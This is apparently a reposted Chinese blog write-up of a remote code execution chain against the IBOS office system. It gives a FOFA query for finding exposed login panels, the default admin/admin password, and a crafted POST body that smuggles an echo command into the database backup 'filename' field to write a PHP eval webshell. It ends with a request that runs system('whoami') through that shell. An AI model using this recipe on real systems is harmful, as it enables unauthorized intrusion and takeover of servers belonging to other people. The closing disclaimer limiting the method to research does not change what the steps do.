一、后台弱口令
fofa语句:
body="IBOS" && body="login-panel"
我们随便点一个进去
弱口令:admin/admin
但是经过多次测试发现存在弱口令的只有一两个,这就导致后面的步骤将无法继续进行,所以多找找就好
二、任意文件上传
这里我们已经到后台了,点通用设置->数据库->开启更多选项->选择系统 MySQL Dump (Shell) 备份这个选项
往下拉,点提交,抓包
在post数据里替换下面内容,上传shell
backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=a3b4%26echo "<?php eval($_GET[a3b4]);?>">a3b4%PATHEXT:~0,1%php%26a3b4&dbSubmit=1
三、远程代码执行
接着当然就是访问shell了
http://xxx.xxx.xxx.xxx/a3b4.php?cmd=system(%22whoami%22);
访问个phpinfo
因为是win的,那就再来个dir
到这里结束啦
推荐一下公众号
bgbing星球:渗透测试,内网渗透,SRC漏洞分享,安全开发,安全武器库
更多渗透测试,可以到星球学习啦(送fofa高级会员)
凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数
本文始发于微信公众号(bgbing安全):IBOS 数据库模块 远程代码执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论